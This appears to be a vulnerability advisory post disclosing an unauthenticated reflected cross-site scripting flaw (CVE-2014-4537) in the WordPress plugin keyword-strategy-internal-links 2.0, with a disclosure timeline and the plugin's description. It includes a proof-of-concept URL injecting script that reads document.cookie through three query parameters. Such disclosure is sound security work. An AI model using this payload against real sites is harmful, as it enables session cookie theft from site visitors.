wp-plugin : keyword-strategy-internal-links – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : keyword-strategy-internal-links

 

Effected Version : 2.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

PoC:
http://localhost/wordpress/wp-content/wp-plugs/keywordstrategyinternallinks/inpage.tpl.php?sort=sort%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&search=search%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&dir=dir%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-21

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4537

 
Plugin Description :
 
The Keyword Strategy Internal Links plugin automatically links keywords to pages within a website.

For example, you can make the first instance of the word "widgets" on any page to automatically link to the page yoursite.com/widgets/

= Here are the features =
* automatically link keywords to their destination URLs
* enable the Keyword Strategy tracker, which detects your backlinks and the keywords people use to find your site
* easily insert keyword variations into your pages to attract additional visitors to your website
* find additional pages within your site that would be good for additional internal links

Please note that this plugin requires an active Keyword Strategy account. You can try a free 30-day trial of this powerful tool for Search Engine Optimization.

Leave a Reply

Your email address will not be published. Required fields are marked *